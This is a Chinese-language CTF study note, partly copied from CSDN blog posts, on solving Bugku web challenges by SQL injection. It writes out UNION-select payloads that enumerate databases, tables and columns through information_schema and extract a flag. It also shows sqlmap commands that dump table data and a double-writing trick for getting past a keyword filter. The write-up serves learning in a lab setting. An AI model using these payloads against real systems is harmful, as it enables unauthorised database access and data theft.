索引:
[成绩单] [login1][多次]
其他150+的web题目
=============================
首先,我们通过[多次]这个题目来学习一下
url藏着id 那么id=1 根据提示也猜存在sql注入
SQL里没有双引号用法,数据类型为字符时用单引号
---------不知道为什么 先记住吧。。
id=1后面加单引号会报错,后面加--+注释返回正常,确定存在SQL注入
【id=1‘ 是不行的 id=1=1--+是可以的(不知道为什么)】
然后试了一下 or这俩是错误 ,但oorr可以(存在过滤,可以进行双写)
那么我们用【异或注入来处理一下】
忽然灵光一现。。。 所以说要多走走多活动活动啊,,,,
sql是恶意注入,分为:
用了’,导致后面的语法变成了一串字符串(多神奇啊 ) 全都错了...
用了#之后,用了-- +之后.....
来源:
https://blog.csdn.net/johnlxj/article/details/82153355?utm_source=blogxgwz3
方法一:常规方法
进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4#
发现有四个表且都有回显
于是 就开始爆破吧
通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag
之后通过 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名fl4g,sc
很显然我们需要的数据在fl4g这个表里
接下来我们就要暴字段了
通过id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#
得到字段skctf_flag
最后我们就可以开始查询数据了
通过id=-1' union select 1,2,3,skctf_flag from fl4g#
得到BUGKU{Sql_INJECT0N_4813drd8hz4}
---------------------
原文:https://blog.csdn.net/johnlxj/article/details/82153355
还有就是
然后打开sqlmap开始爆库:sqlmap.py -r “C:333.txt” -p id --current-db
-r –> 加载一个文件
-p –>指定参数
–current-db –>获取当前数据库名称(current前有两个-)
可以看到它的数据库为 ‘skctf_flag’,接着就是爆表
sqlmap.py -r “C:333.txt” -p id -D skctf_flag --tables
-D –>指定数据库名称
–tables –>列出数据库中的表(tables前有两个-)
可以看到当前数据库中有两个表,很明显,flag应该在fl4g表中,下面就是该爆出表中的字段了
sqlmap.py -r “C:333.txt” -p id -D skctf_flag -T fl4g --columns
-T –>指定表名称
–columns –>列出表中的字段
fl4g表中有一个名为skctf_flag字段,最后列出字段信息就可以啦。
sqlmap.py -r “c:333.txt” -p id -D skctf_flag -T fl4g -C skctf_flag --dump
–dump –>列出字段数据(dump前有两个-)
---------------------
作者:Tle_Camouflage
来源:CSDN
原文:https://blog.csdn.net/Tle_Camouflage/article/details/81978305
版权声明:本文为博主原创文章,转载请附上博文链接!
==================
?id=1' union select 1,2,3,4 #
成绩单的题目直接使用这个注入,发现可以回显
然后下面的语句是用来搞出来系统里面备份的文件的....
以及.... ?id=1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf_flag'#
from information_schema.tables where table_schema='skctf_flag'#